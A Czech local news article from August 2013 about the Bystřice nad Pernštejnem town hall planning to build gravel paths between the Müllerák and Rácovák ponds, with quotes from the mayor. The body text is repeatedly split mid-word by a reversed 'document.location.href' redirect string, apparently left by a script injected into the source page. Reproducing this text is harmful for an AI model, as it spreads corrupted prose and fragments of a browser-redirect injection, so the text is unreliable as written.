Bystřice nad Pernštejnem, aktuality, úprava cest, rybníky, Rácovák
Rainbow page separator

Bystřičtí upraví cesty mezi rybníky

Pondělí, 5. srpna 2013

rybnik-babin-300x225Bystřice nad Pernštejnem / Přibližně 200 až 300 tisíc korun plánuje vydat bystřická radnice za úpravu cest v lokalitě Rácová, konkrétně mezi rybníky Müllerák a Rácovák. Už dříve na vybudování cest zkoušeli s pomocí místního rybářského svazu získat dotaci, ale k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu nakonec nedošlo.„Během [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to měsíce necháme vytyčit pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor, kde nové cesty vzniknou. Pracovníci Lesního společenství obcí pak provedou vyčištění místa od nále[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových rostlin. Předpokládáme, že začátkem září by pak mohlo dojít k úpravě cest a jejich vysypání šo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolinou. Možná tam umístíme i informační tabuli,“ sdělil mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Bystřice Josef Vojta.

Půjde zhruba o pět set metrů vysypaných cestiček. Poslední prázdninový den se bude v lokalitě konat tradiční akce bystřické radnice – procházka zakončená opékáním špekáčků s doprovodným programem. „V tu dobu ještě cesty zcela dokončeny nebudou, ale vyznačeny ano,“ poznamenal Vojta.

K revitalizaci Rácové došlo před několika lety, v jejím rámci byl obnoven rybník Müllerák a vybudován nový, který byl pojmenován jako Rácovák. V oblasti se rovněž nachází patnácté z celkem sedmnácti turistických Bystřických zastavení pro poznávání města a jeho okolí.